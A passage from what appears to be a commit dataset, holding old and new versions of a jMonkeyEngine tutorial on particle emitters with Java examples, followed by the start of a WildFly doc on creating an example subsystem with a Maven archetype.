code:\n\n[source,java]\n----\n\n\n\n\n ParticleController pCtrl = new ParticleController(\n \"TemplateFlames\",\n new PointMesh(assetManager, \"Textures\/flame.png\", 2, 2),\n 1300,\n 3,\n 4,\n new MeshSource(rockCtrl.getGeometry()),\n new RegularEmission(320),\n new SizeInfluencer(0.5f, 2),\n new ColorInfluencer(new ColorRGBA(1,1,0.1f, 1f), new ColorRGBA(1,0,0,0.05f)),\n new GravityInfluencer(new Vector3f(0, 0.3f, 0)),\n new RandomImpulseInfluencer(\n RandomImpulseInfluencer.ImpulseApplicationTime.INITIALIZE,\n new Vector3f(-0.5f, -0.5f, -0.5f),\n new Vector3f(0.5f, 0.5f, 0.5f)));\n\n rootNode.attachChild(pCtrl.getGeometry());\n\n\n----\n\nResults in something that looks like this:\n\n* link:https:\/\/www.youtube.com\/watch?v=WGR5RzF9APg[Video: Particle Emitter Example 4]\n\nYou can see that, while dramatic, the fire is left behind each particle; this is because, although it is emitted from the face of the particle at its current position, it has no knowledge of how that particle is moving.\n\nTo allow for this we also offer a different emitter, which allows one ParticleController to act as the source for another. The emitted particles are then able to start with the same velocity and rotation as the particle they are being emitted from and then move onwards from there as appropriate.\n\nLeave everything else the same but change the MeshSource into:\n\n[source,java]\n----\n\n new ParticleParticleSource(rockCtrl),\n\n----\n\nYou can see that this gives much better results:\n\n* link:https:\/\/www.youtube.com\/watch?v=2BlBZVM0EZQ[Video: Particle Emitter Example 5]\n\nThere are a lot of falling rocks and fire here, but not much in the way of smoke. That could be added using a multi-colour emitter as previously, but the standard particle material is additive. That means it can only make colours brighter, never darker. 
For smoke it should be able to darken as well as lighten.\n\nTo add smoke we can add a third emitter after the other two:\n\n[source,java]\n----\n\n\n\/\/ Construct a new material for the smoke based off the default particle material\n Material smokeMat = new Material(\n assetManager, \"Common\/MatDefs\/Misc\/Particle.j3md\");\n\/\/ The Smoke.png texture can be found in the jme3 test data\n smokeMat.setTexture(\"Texture\",\n assetManager.loadTexture(\"Textures\/Smoke.png\"));\n\/\/ Set the blend mode to Alpha rather than AlphaAdditive so that dark smoke\n\/\/ can darken the scene behind it\n smokeMat.getAdditionalRenderState().setBlendMode(RenderState.BlendMode.Alpha);\n\/\/ For point sprite meshes this parameter must be set\n smokeMat.setBoolean(\"PointSprite\", true);\n\n\/\/ Construct the new particle controller\n pCtrl = new ParticleController(\n \"TemplateSmoke\",\n\/\/ The Smoke.png texture contains 15 sprites, if you use a different texture adjust\n\/\/ these parameters accordingly.\n new PointMesh(smokeMat, 15, 1),\n 800,\n 4,\n 5,\n new ParticleParticleSource(rockCtrl),\n new RegularEmission(180),\n new SizeInfluencer(1f, 2.5f),\n new MultiColorInfluencer(\n new MultiColorInfluencer.Stage(0, new ColorRGBA(1, 1, 1, 0)),\n new MultiColorInfluencer.Stage(0.5f, new ColorRGBA(0, 0, 0, 0.5f)),\n new MultiColorInfluencer.Stage(1, new ColorRGBA(1, 1, 1, 0))),\n new GravityInfluencer(new Vector3f(0, 0.75f, 0)),\n new RandomImpulseInfluencer(\n RandomImpulseInfluencer.ImpulseApplicationTime.INITIALIZE,\n new Vector3f(-0.5f, -0.5f, -0.5f),\n new Vector3f(0.5f, 0.5f, 0.5f)));\n\n rootNode.attachChild(pCtrl.getGeometry());\n\n----\n\nThe results look something like:\n\n* link:https:\/\/www.youtube.com\/watch?v=01qCBGBvf-c[Video: Particle Emitter Example 5]\n\nTo complete the effect one final line of code adds a skybox (using another texture that can be find in the test data):\n\n[source,java]\n----\n\n rootNode.attachChild(SkyFactory.createSky(assetManager, \"Textures\/BrightSky.dds\", false));\n\n----\n\nNow we have the final effect which looks like:\n\n* link:https:\/\/www.youtube.com\/watch?v=uDeWAjw4LxU[Video: Particle Emitter Example 6]\n","old_contents":"= Next Generation Particle Emitters\n:revnumber: 2.0\n:revdate: 2020\/07\/25\n\n\nThis is a new particle system for jME3 posted for review and comments. This is an opportunity for people to comment on and request changes to the +++<abbr title=\"Application Programming Interface\">API<\/abbr>+++ or the internal functionality of the system.\nThe code for this particle system can be found link:https:\/\/github.com\/jMonkeyEngine-Contributions\/ParticleController[jMonkeyEngine-Contributions]\n\nApologies for the slight jitter in some of the videos, the VideoRecorderState seems to be causing some issues which are not present when the application is running normally.\n\n\n== Credits\n\nThese particle emitters are inspired by and use some code from t0neg0ds particle emitters as described link:http:\/\/hub.jmonkeyengine.org\/t\/influencer-based-particleemitter-candidate-mesh-based-animated-particles\/25831[here]\n\nThose in turn were based on the original jME3 particle system by Kirill Vainer\n\n\n== The Big Picture\n\nThe core of all Particle Emitters is a ParticleController. That is used to manage all of the particles, the behaviour of the particles themselves though is controlled though a number of other classes that are plugged in to the ParticleController to provide the required functionality. 
You can think of the ParticleController as providing the central hub into which you plug all the modules you need to get the desired behaviour.\n\nAn easy way to see what you need is to create a new ParticleController and then look at the constructor, you can see what parameters need to be supplied there.\n[cols=\"2\", options=\"header\"]\n|===\n\na| name\na| The name to use for the geometry in the scene graph\n\na| mesh\na| The mesh to use (Usually either PointMesh or QuadMesh)\n\na| maxParticles\na| The maximum number of particles to allow active at any one time\n\na| lifeMin\na| The minimum amount of time (in seconds) for which each particle lives\n\na| lifeMax\na| The maximum amount of time (in seconds) for which each particle lives\n\na| source\na| The source from which the particles are spawned\n\na| emissionController\na| The frequency and timing with which particles are spawned. If null then no particles are automatically spawned and they must be triggered manually using emitNextParticle() or emitAllParticles()\n\na| influencers\na| Zero or more ParticleInfluencers, each of which changes the behaviour of the particles.\n\n|===\n\nBy selecting the behaviour you desire for each option you can configure up a virtually infinite array of possible particle emitters.\n\nWe will now walk through some common examples and possible uses, and then in the end we will document all of the possible choices for these options.\n\nFor a full reference of the standard options available see the xref:effect\/particles\/reference.adoc[Reference Page].\n\n\n== Simple Fire\n\n[source,java]\n----\n\n\npublic class HelloParticles1_SimpleFire extends SimpleApplication {\n\n public static void main(String[] args){\n HelloParticles1_SimpleFire app = new HelloParticles1_SimpleFire();\n app.start(); \/\/ start the game\n }\n\n @Override\n public void simpleInitApp() {\n\n\/\/ Construct a new ParticleController\n ParticleController pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SimpleFire\",\n\/\/ Use a simple point mesh (the fastest but most limitted mesh type) with the specified\n\/\/ image (from jME3-testdata). 
The image actually contains a 2x2 grid of sprites.\n new PointMesh(assetManager, \"Effects\/Explosion\/flame.png\", 2, 2),\n\/\/ Allow at most 32 particles at any time\n 32,\n\/\/ Particles last for at least 2 seconds\n 2,\n\/\/ And at most 3 seconds\n 3,\n\/\/ Point sources always generate particles at the location of the source, the particles\n\/\/ are given a random velocity between the two given.\n new PointSource(new Vector3f(-3, 0, -3), new Vector3f(3, 0, 3)),\n\/\/ Emit particles at regular intervals, 10 particles every second\n new RegularEmission(10),\n\/\/ ** Influencers start here\n\/\/ Select a random sprite from the 4 available for each particle\n new RandomSpriteInfluencer(),\n\/\/ Particles start off with a size of 0.5 units, end with a radius of 0.1\n new SizeInfluencer(0.5f, 0.1f),\n\/\/ Particles start yellow full opacity and fade towards red with very low opacity\n new ColorInfluencer(new ColorRGBA(1,1,0.2f,1), new ColorRGBA(1,0,0,0.1f)),\n\/\/ No matter what velocity particles started with they will start moving upwards.\n new PreferredDirectionInfluencer(new Vector3f(0, 1, 0), 0.25f));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n }\n}\n\n----\n\nRun that and the result should look something like:\n\nimage:jme3\/particles1.jpg[particles1.jpg,width=\"\",height=\"\"]\n\n\n== Simple Fire and Smoke\n\n[source,java]\n----\n\n @Override\n public void simpleInitApp() {\n\n\/\/ Construct a new ParticleController\n ParticleController pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SimpleFire\",\n\/\/ Use a simple point mesh (the fastest but most limitted mesh type) with the specified\n\/\/ image (from jME3-testdata). The image actually contains a 2x2 grid of sprites.\n new PointMesh(assetManager, \"Effects\/Explosion\/flame.png\", 2, 2),\n\/\/ Allow at most 50 particles at any time, the particles are lasting longer this time\n\/\/ so we need to allow more on screen at once\n 50,\n\/\/ Particles last for at least 4 seconds\n 4,\n\/\/ And at most 5 seconds\n 5,\n\/\/ Point sources always generate particles at the location of the source, the particles\n\/\/ are given a random velocity between the two given.\n new PointSource(new Vector3f(-3, 0, -3), new Vector3f(3, 0, 3)),\n\/\/ Emit particles at regular intervals, 10 particles every second\n new RegularEmission(10),\n\/\/ ** Influencers start here\n\/\/ Select a random sprite from the 4 available for each particle\n new RandomSpriteInfluencer(),\n\/\/ Particles start off with a size of 0.5 units, end with a radius of 0.1\n new SizeInfluencer(0.5f, 0.25f),\n\/\/ Particles start yellow full opacity and fade towards red with very low opacity\n new MultiColorInfluencer(\n new MultiColorInfluencer.Stage(0, new ColorRGBA(1, 1, 0.1f, 1)),\n new MultiColorInfluencer.Stage(0.15f, new ColorRGBA(1, 0, 0, 0.25f)),\n new MultiColorInfluencer.Stage(0.3f, new ColorRGBA(1f, 1f, 1f, 0.5f)),\n new MultiColorInfluencer.Stage(1, new ColorRGBA(1f,1f,1f,0f))\n ),\n\/\/ No matter what velocity particles started with they will start moving upwards.\n new PreferredDirectionInfluencer(new Vector3f(0, 1, 0), 0.25f));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n }\n\n----\n\nYou can see that the only change is to make the particles last a little longer and to change the ColorInfluencer for a MultiColorInfluencer, and yet the results look quite 
different:\n\nimage:jme3\/particles2.jpg[particles2.jpg,width=\"\",height=\"\"]\n\nThis isn't a very convincing fire yet, but it is very simple to get up and running. One problem with this approach is that particles are done using an alpha-additive material, they can only make things brighter but never darker. That is not ideal for smoke which should be able to make them darker too. We will look at this again later but for now we will move on to some different mesh types.\n\n\n== Quad Meshes and Billboarding\n\nPoint Meshes are extremely fast, but they have a number of limitations. The main ones being that the sprites must always be facing towards the screen and that on certain graphics cards the maximum number of pixels a sprite can occupy on the screen is limited.\n\nWhile PointMesh is recommended for basic particles for more advanced options there is the QuadMesh, this constructs each particle using a quad and as a result can allow any size on the screen and any orientation. The following example combines two separate particle emitters to produce a spell-like effect.\n\n\n[NOTE]\n====\n\nThe flame image from before is used for the second emitter, the first emitter uses this image which you can download and use:\n\nimage:jme3\/runecircle.png[runecircle.png,width=\"256\",height=\"\"]\n\n====\n\n\n[source,java]\n----\n\n @Override\n public void simpleInitApp() {\n\n\/\/ Construct a new ParticleController to provide the actual spell runes effect\n ParticleController pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SpellRunes\",\n\/\/ Use a Quad Mesh, this image is available for download on this page. The texture file contains\n\/\/ a single image so there are no sprite columns and rows to set up. The BillboardStrategy is how\n\/\/ the particles should be oriented, in this case it uses the particle rotation.\n new QuadMesh(QuadMeshBillboardStrategy.USE_PARTICLE_ROTATION, assetManager, \"Textures\/runeCircle.png\"),\n\/\/ Allow at most 9 particles at any time\n 9,\n\/\/ Particles always last for 4 seconds\n 4,\n 4,\n\/\/ We want to generate all particles from the same location with the same velocity.\n new PointSource(new Vector3f(0, 1f, 0), new Vector3f(0, 1f, 0)),\n\/\/ Emit particles at regular intervals, 4 particles every second\n new RegularEmission(2),\n\/\/ ** Influencers start here\n\/\/ These particles should be size 3 and stay the same size\n new SizeInfluencer(3, 3),\n\/\/ Start the particles at full opacity blue and then fade them out to 0 opacity cyan.\n new ColorInfluencer(ColorRGBA.Blue, new ColorRGBA(0, 1, 1, 0)),\n\/\/ Rotate all particles by the same amount. The units are radians-per-second\n new RotationInfluencer(\n new Vector3f(0, FastMath.QUARTER_PI, 0),\n new Vector3f(0, FastMath.QUARTER_PI, 0), false));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n\n\n\/\/ Construct a new ParticleController to provide the central glow effect\n pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SpellBase\",\n\/\/ Use a simple point mesh (the fastest but most limitted mesh type) with the specified\n\/\/ image (from jME3-testdata). 
The image actually contains a 2x2 grid of sprites.\n new PointMesh(assetManager, \"Textures\/flame.png\", 2, 2),\n\/\/ Allow at most 76 particles at any time\n 76,\n\/\/ Particles last for at least 5 seconds\n 5,\n\/\/ And at most 5 seconds\n 5,\n\/\/ Point sources always generate particles at the location of the source, the particles\n\/\/ are given a random velocity between the two given.\n new PointSource(new Vector3f(-1f, 0, -1f), new Vector3f(1f, 0.5f, 1f)),\n\/\/ Emit particles at regular intervals, 15 particles every second\n new RegularEmission(15),\n\/\/ ** Influencers start here\n\/\/ Select a random sprite from the 4 available for each particle\n new RandomSpriteInfluencer(),\n\/\/ Particles start red with some blue and green and fade towards blue zero opacity\n\/\/ Because particles are rendered using an additive blend then any area where a lot\n\/\/ of particles overlap will end up white.\n new ColorInfluencer(new ColorRGBA(1,0.25f,0.25f,0.25f), new ColorRGBA(0,0,1,0f)));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n\n\n cam.setLocation(new Vector3f(0, 10, -10));\n cam.lookAt(Vector3f.ZERO, Vector3f.UNIT_Y);\n }\n\n\n----\n\nThe result should look something like:\n\n* link:https:\/\/www.youtube.com\/watch?v=_Spjqag99HY[Video: Particle Emitter Example 1]\n\n\n== Using a mesh as the particle source\n\nThere is a model of a monkeys head in the test data that is used in this example, although you can use any other model you like. Just make sure you can find the geometry within the model for the next step.\n\n[source,java]\n----\n\n @Override\n public void simpleInitApp() {\n\n Node monkey = (Node) assetManager.loadModel(\"Models\/MonkeyHead\/MonkeyHead.mesh.xml\");\n rootNode.attachChild(monkey);\n\n DirectionalLight dl = new DirectionalLight();\n dl.setDirection(new Vector3f(-0.1f,-0.7f,-1).normalizeLocal());\n dl.setColor(new ColorRGBA(0.88f, 0.60f, 0.60f, 1.0f));\n rootNode.addLight(dl);\n\n AmbientLight al = new AmbientLight();\n al.setColor(ColorRGBA.White);\n rootNode.addLight(al);\n\n----\n\nThe result should look something like:\n\nimage:jme3\/particles3.jpg[particles3.jpg,width=\"\",height=\"\"]\n\nNow lets set fire to the monkey! (No monkeys were harmed during the making of this particle system!).\n\n[source,java]\n----\n\n\n\/\/ Construct a new ParticleController\n ParticleController pCtrl = new ParticleController(\n\/\/ The name of the emitter\n \"SimpleFire\",\n\/\/ Use a simple point mesh (the fastest but most limitted mesh type) with the specified\n\/\/ image (from jME3-testdata). The image actually contains a 2x2 grid of sprites.\n new PointMesh(assetManager, \"Textures\/flame.png\", 2, 2),\n\/\/ Allow at most 1200 particles at any time, the particles are lasting longer this time\n\/\/ so we need to allow more on screen at once\n 1200,\n\/\/ Particles last for at least 4 seconds\n 4,\n\/\/ And at most 5 seconds\n 5,\n\/\/ A MeshSource scans a geometry and picks a random point on the surface of that\n\/\/ geometry in order to emit the particle from it. 
The particle has an inital velocity\n\/\/ of 1wu\/s along the normal of the triangle from which it is emitted.\n new MeshSource(g),\n\/\/ Emit particles at regular intervals, 10 particles every second\n new RegularEmission(240),\n\/\/ ** Influencers start here\n\/\/ Select a random sprite from the 4 available for each particle\n new RandomSpriteInfluencer(),\n\/\/ Particles start off with a size of 0.1 units, end with a size of 0.15\n new SizeInfluencer(0.1f, 0.15f),\n\/\/ Particles have a constant speed of 0.25f, this will modify the original speed\n\/\/ from the emitter and then allow the GravityInfluencer to change the direction\n\/\/ of motion but constrain the speed\n new SpeedInfluencer(0.25f, 0.25f),\n\/\/ Fade the paticles through a range of colours\n new MultiColorInfluencer(\n new MultiColorInfluencer.Stage(0, new ColorRGBA(1, 1, 0.1f, 1)),\n new MultiColorInfluencer.Stage(0.25f, new ColorRGBA(1, 0, 0, 0.25f)),\n new MultiColorInfluencer.Stage(0.5f, new ColorRGBA(1f, 1f, 1f, 0.25f)),\n new MultiColorInfluencer.Stage(1, new ColorRGBA(1f,1f,1f,0f))\n ),\n\/\/ No matter what velocity particles started with they will start moving upwards.\n new GravityInfluencer(new Vector3f(0, 0.5f, 0)));\n\n\/\/ Finally attach the geometry to the rootNode in order to start the particles running\n rootNode.attachChild(pCtrl.getGeometry());\n\n----\n\nAgain this is just a very simple example, much more sophisticated fire effects are possible with the use of the right textures and mixture of emitters and influencers. The result though should look something like this:\n\n* link:https:\/\/www.youtube.com\/watch?v=W__zGJHZ2AU[Video: Particle Emitter Example 2]\n\n\n== Meshes and Weighted Meshes\n\nThe previous example uses a MeshSource, this picks a random triangle from the mesh without any regard given to the size of different triangles. This means areas with small triangles are actually more likely to emit particles than areas with large triangles. For most meshes this is not visible, however there is a WeightedMeshSource available if this should be a problem.\n\nThe WeightedMeshSource scans the mesh and works out a weight for each triangle based on its relative size, so that the result is an even spread of particles even with very large differences in triangle sizes. There are some limitations with this though:\n\n. The WeightedMeshSource consumes more memory as it needs to remember the weights\n. The WeightedMeshSource is slower as it needs to do more work to pick a triangle\n. The WeightedMeshSource does not update automatically if the mesh changes, if triangles are added they will not emit, if triangles are removed it could cause a crash. If triangles change shape then the weights are not updated.\n\nThere is a method available to cause the weights to be recalculated which can be used if changing the mesh, but really if possible a non-weighted MeshSource should be used for dynamic meshes.\n\n\n== 3d Particles - TemplateMesh\n\nThe previous mesh examples all use simple 2d quads to display images. There is another mesh type though, the TemplateMesh, which allows fully featured 3d particles to be used.\n\n\n[NOTE]\n====\n\nThere is a rock texture available in the jME3 test data, or you can substitute any other suitable texture. 
The model for this example is: link:http:\/\/www.zero-separation.com\/particles\/FracturedCube.j3o[FracturedCube.j3o]\n\n====\n\n\n[source,java]\n----\n\n @Override\n public void simpleInitApp() {\n\n \/\/ Since we actually use a full lit material for these particles we need\n \/\/ to add a light to the scene in order to see anything.\n DirectionalLight dl = new DirectionalLight();\n dl.setDirection(new Vector3f(-0.1f,-0.7f,-1).normalizeLocal());\n dl.setColor(new ColorRGBA(0.6f, 0.60f, 0.60f, 1.0f));\n rootNode.addLight(dl);\n\n\/\/ A standard lit material is used, this rock texture was taking from the\n\/\/ jme3 test data but you can easily substitute your own.\n Material rock = new Material(assetManager, \"Common\/MatDefs\/Light\/Lighting.j3md\");\n rock.setTexture(\"DiffuseMap\", assetManager.loadTexture(\"Textures\/Rock.PNG\"));\n rock.setFloat(\"Shininess\", 100f);\n\n\/\/ A PointSource is actually a fully featured Spatial object, in this case\n\/\/ we simply adjust its translation, but it can actually be attached to the\n\/\/ scene graph and the source will automatically move as the Node to which\n\/\/ it is attached is transformed.\n PointSource source = new PointSource(new Vector3f(-5,-5,-5), new Vector3f(5,5,5));\n source.setLocalTranslation(0, 10, -20);\n\n\/\/ A TemplateMesh uses any number of standard meshes to be the template for\n\/\/ each 3d particle. This model was generated simply by taking a cube in\n\/\/ Blender and running a fracture script on it to generate 20 fragments.\n Node n = (Node) assetManager.loadModel(\"Models\/FracturedCube.j3o\");\n Mesh[] templates = new Mesh[n.getChildren().size()];\n int i = 0;\n for (Spatial s: n.getChildren()) {\n Geometry g = (Geometry)((Node)s).getChild(0);\n templates[i++] = g.getMesh();\n }\n\n\/\/ Construct the new particle controller\n ParticleController rockCtrl = new ParticleController(\n \"TemplateMesh\",\n\/\/ The TemplateMesh uses the rock material we created previously, the two boolean\n\/\/ flags say that we are not interested in vertex colours but we do want the vertex\n\/\/ normals. The array of meshes extracted from the model is then passed in to use\n\/\/ as models for each particle.\n new TemplateMesh(rock, false, true, templates),\n\/\/ A maximum of 64 particles at once, each lasting for 5 to 5.5 seconds.\n 64,\n 5,\n 5.5f,\n\/\/ Particles are emitted from the source that we created and positioned earlier\n source,\n\/\/ Emit 8 particles per second\n new RegularEmission(8),\n\/\/ The \"sprites\" in this case are the available templates. The TemplateMesh has\n\/\/ one spriteColumn for each template it has been provided, so the standard\n\/\/ RandomSpriteInfluencer just causes one to be picked at random each time a\n\/\/ particle is emitted.\n new RandomSpriteInfluencer(),\n\/\/ Rocks fall.\n new GravityInfluencer(new Vector3f(0, -4, 0)),\n\/\/ Rocks spin.\n new RotationInfluencer(new Vector3f(-2, -2, -2), new Vector3f(2, 2, 2), false));\n\n rootNode.attachChild(rockCtrl.getGeometry());\n }\n\n----\n\nThe result should look like:\n\n* link:https:\/\/www.youtube.com\/watch?v=a7y53UF8Giw[Video: Particle Emitter Example 3]\n\nAny number and mixture of models can be used, although as it is all a single mesh the same material must be used for all of them. 
It is recommended to keep a similar number of vertices for each of the models but that is not a strict requirement.\n\n\n== Emitting Particles from Particles\n\nTo add more dramatic effects sometimes you want to emit particles from particles, this could be done simply by attaching a MeshSource for the second controller to the mesh from the first controller. There are a number of limitations to this approach though, which will be demonstrated now:\n\nAdding the following code:\n\n[source,java]\n----\n\n\n\n\n ParticleController pCtrl = new ParticleController(\n \"TemplateFlames\",\n new PointMesh(assetManager, \"Textures\/flame.png\", 2, 2),\n 1300,\n 3,\n 4,\n new MeshSource(rockCtrl.getGeometry()),\n new RegularEmission(320),\n new SizeInfluencer(0.5f, 2),\n new ColorInfluencer(new ColorRGBA(1,1,0.1f, 1f), new ColorRGBA(1,0,0,0.05f)),\n new GravityInfluencer(new Vector3f(0, 0.3f, 0)),\n new RandomImpulseInfluencer(\n RandomImpulseInfluencer.ImpulseApplicationTime.INITIALIZE,\n new Vector3f(-0.5f, -0.5f, -0.5f),\n new Vector3f(0.5f, 0.5f, 0.5f)));\n\n rootNode.attachChild(pCtrl.getGeometry());\n\n\n----\n\nResults in something that looks like this:\n\n* link:https:\/\/www.youtube.com\/watch?v=WGR5RzF9APg[Video: Particle Emitter Example 3]\n\nYou can see that while dramatic the fire is left behind each particle, this is because although it is emitted from the face of the particle at its current position it has no knowledge of how that particle is moving.\n\nTo allow for this we also offer a different emitter, this allows one ParticleController to act as the source for another. The emitted particles are then able to start with the same velocity and rotation of the particle they are being emitted from and then move onwards from there as appropriate.\n\nLeave everything else the same but change the MeshSource into\n\n[source,java]\n----\n\n new ParticleParticleSource(rockCtrl),\n\n----\n\nYou can see that this gives much better results:\n\n* link:https:\/\/www.youtube.com\/watch?v=2BlBZVM0EZQ[Video: Particle Emitter Example 4]\n\nThere is a lot of falling rocks and fire here, but not much in the way of smoke. That could be added using a multi-colour emitter as previously, but the standard particle material is additive. That means it can only make colours brighter, never darker. 
For smoke it should be able to darken as well as lighten.\n\nTo add smoke we can add a third emitter after the other two:\n\n[source,java]\n----\n\n\/\/ Construct a new material for the smoke based on the default particle material\n Material smokeMat = new Material(\n assetManager, \"Common\/MatDefs\/Misc\/Particle.j3md\");\n\/\/ The Smoke.png texture can be found in the jme3 test data\n smokeMat.setTexture(\"Texture\",\n assetManager.loadTexture(\"Textures\/Smoke.png\"));\n\/\/ Set the blend mode to Alpha rather than AlphaAdditive so that dark smoke\n\/\/ can darken the scene behind it\n smokeMat.getAdditionalRenderState().setBlendMode(RenderState.BlendMode.Alpha);\n\/\/ For point sprite meshes this parameter must be set\n smokeMat.setBoolean(\"PointSprite\", true);\n\n\/\/ Construct the new particle controller\n pCtrl = new ParticleController(\n \"TemplateSmoke\",\n\/\/ The Smoke.png texture contains 15 sprites; if you use a different texture adjust\n\/\/ these parameters accordingly.\n new PointMesh(smokeMat, 15, 1),\n 800,\n 4,\n 5,\n new ParticleParticleSource(rockCtrl),\n new RegularEmission(180),\n new SizeInfluencer(1f, 2.5f),\n new MultiColorInfluencer(\n new MultiColorInfluencer.Stage(0, new ColorRGBA(1, 1, 1, 0)),\n new MultiColorInfluencer.Stage(0.5f, new ColorRGBA(0, 0, 0, 0.5f)),\n new MultiColorInfluencer.Stage(1, new ColorRGBA(1, 1, 1, 0))),\n new GravityInfluencer(new Vector3f(0, 0.75f, 0)),\n new RandomImpulseInfluencer(\n RandomImpulseInfluencer.ImpulseApplicationTime.INITIALIZE,\n new Vector3f(-0.5f, -0.5f, -0.5f),\n new Vector3f(0.5f, 0.5f, 0.5f)));\n\n rootNode.attachChild(pCtrl.getGeometry());\n\n----\n\nThe results look something like:\n\n* link:https:\/\/www.youtube.com\/watch?v=01qCBGBvf-c[Video: Particle Emitter Example 5]\n\nTo complete the effect one final line of code adds a skybox (using another texture that can be found in the test data):\n\n[source,java]\n----\n\n rootNode.attachChild(SkyFactory.createSky(assetManager, \"Textures\/BrightSky.dds\", false));\n\n----\n\nNow we have the final effect which looks like:\n\n* link:https:\/\/www.youtube.com\/watch?v=uDeWAjw4LxU[Video: Particle Emitter Example 6]\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"27981b64c351c7928c1be07bbd036abd2f5a89ae","subject":"[WFLY-11932] Advise users to use HTTPS as well in example subsystem doc","message":"[WFLY-11932] Advise users to use HTTPS as well in example subsystem doc\n","repos":"jstourac\/wildfly,wildfly\/wildfly,rhusar\/wildfly,rhusar\/wildfly,pferraro\/wildfly,pferraro\/wildfly,tadamski\/wildfly,wildfly\/wildfly,wildfly\/wildfly,pferraro\/wildfly,tadamski\/wildfly,jstourac\/wildfly,rhusar\/wildfly,rhusar\/wildfly,tadamski\/wildfly,iweiss\/wildfly,iweiss\/wildfly,wildfly\/wildfly,iweiss\/wildfly,jstourac\/wildfly,jstourac\/wildfly,iweiss\/wildfly,pferraro\/wildfly","old_file":"docs\/src\/main\/asciidoc\/_extending-wildfly\/Example_subsystem.adoc","new_file":"docs\/src\/main\/asciidoc\/_extending-wildfly\/Example_subsystem.adoc","new_contents":"[[Example_subsystem]]\n= Example subsystem\n\nOur example subsystem will keep track of all deployments of certain\ntypes containing a special marker file, and expose operations to see how\nlong these deployments have been deployed.\n\n[[create-the-skeleton-project]]\n== Create the skeleton project\n\nTo make your life easier we have provided a maven archetype which will\ncreate a skeleton project for implementing subsystems.\n\n[source,options=\"nowrap\"]\n----\nmvn archetype:generate \\\n 
-DarchetypeArtifactId=wildfly-subsystem \\\n -DarchetypeGroupId=org.wildfly.archetypes \\\n -DarchetypeVersion=8.0.0.Final \\\n -DarchetypeRepository=https:\/\/repository.jboss.org\/nexus\/content\/groups\/public\n----\n\nMaven will download the archetype and its dependencies, and ask you\nsome questions:\n\n[source,options=\"nowrap\"]\n----\n$ mvn archetype:generate \\\n -DarchetypeArtifactId=wildfly-subsystem \\\n -DarchetypeGroupId=org.wildfly.archetypes \\\n -DarchetypeVersion=8.0.0.Final \\\n -DarchetypeRepository=https:\/\/repository.jboss.org\/nexus\/content\/groups\/public\n[INFO] Scanning for projects...\n[INFO]\n[INFO] ------------------------------------------------------------------------\n[INFO] Building Maven Stub Project (No POM) 1\n[INFO] ------------------------------------------------------------------------\n[INFO]\n\n.........\n\nDefine value for property 'groupId': : com.acme.corp\nDefine value for property 'artifactId': : acme-subsystem\nDefine value for property 'version': 1.0-SNAPSHOT: :\nDefine value for property 'package': com.acme.corp: : com.acme.corp.tracker\nDefine value for property 'module': : com.acme.corp.tracker\n[INFO] Using property: name = WildFly subsystem project\nConfirm properties configuration:\ngroupId: com.acme.corp\nartifactId: acme-subsystem\nversion: 1.0-SNAPSHOT\npackage: com.acme.corp.tracker\nmodule: com.acme.corp.tracker\nname: WildFly subsystem project\n Y: : Y\n[INFO] ------------------------------------------------------------------------\n[INFO] BUILD SUCCESS\n[INFO] ------------------------------------------------------------------------\n[INFO] Total time: 1:42.563s\n[INFO] Finished at: Fri Jul 08 14:30:09 BST 2011\n[INFO] Final Memory: 7M\/81M\n[INFO] ------------------------------------------------------------------------\n$\n----\n\n[cols=\",\",options=\"header\"]\n|=======================================================================\n| |Instruction\n\n|1 |Enter the groupId you wish to use\n\n|2 |Enter the artifactId you wish to use\n\n|3 |Enter the version you wish to use, or just hit Enter if you wish to\naccept the default 1.0-SNAPSHOT\n\n|4 |Enter the java package you wish to use, or just hit Enter if you\nwish to accept the default (which is copied from groupId).\n\n|5 |Enter the module name you wish to use for your extension.\n\n|6 |Finally, if you are happy with your choices, hit Enter and Maven\nwill generate the project for you.\n|=======================================================================\n\nWe now have a skeleton project that you can use to\nimplement a subsystem. Import the `acme-subsystem` project into your\nfavourite IDE. A nice side-effect of running this in the IDE is that you\ncan see the javadoc of WildFly classes and interfaces imported by the\nskeleton code. 
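\nThe generated project will look roughly like this (abridged; the exact\ncontents depend on the archetype version):\n\n[source,options=\"nowrap\"]\n----\nacme-subsystem\n|-- pom.xml\n`-- src\n |-- main\n | |-- java\/com\/acme\/corp\/tracker\/extension\n | | |-- SubsystemAdd.java\n | | |-- SubsystemDefinition.java\n | | |-- SubsystemDeploymentProcessor.java\n | | |-- SubsystemExtension.java\n | | `-- SubsystemRemove.java\n | `-- resources\/schema\/mysubsystem.xsd\n `-- test\/java\/com\/acme\/corp\/tracker\/extension\n |-- SubsystemBaseParsingTestCase.java\n `-- SubsystemParsingTestCase.java\n----\n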
If you do a `mvn install` in the project it will work if\nwe plug it into WildFly, but before doing that we will change it to do\nsomething more useful.\n\nThe rest of this section modifies the skeleton project created by the\narchetype to do something more useful, and the full code can be found in\nlink:downloads\/acme-subsystem.zip[acme-subsystem.zip].\n\nIf you do a `mvn install` in the created project, you will see some\ntests being run\n\n[source,options=\"nowrap\"]\n----\n$mvn install\n[INFO] Scanning for projects...\n[...]\n[INFO] Surefire report directory: \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/surefire-reports\n\u00a0\n-------------------------------------------------------\n T E S T S\n-------------------------------------------------------\nRunning com.acme.corp.tracker.extension.SubsystemBaseParsingTestCase\nTests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.424 sec\nRunning com.acme.corp.tracker.extension.SubsystemParsingTestCase\nTests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.074 sec\n\u00a0\nResults :\n\u00a0\nTests run: 3, Failures: 0, Errors: 0, Skipped: 0\n[...]\n----\n\nWe will talk about these later in the\n<<testing-the-parsers,#Testing the\nparsers>> 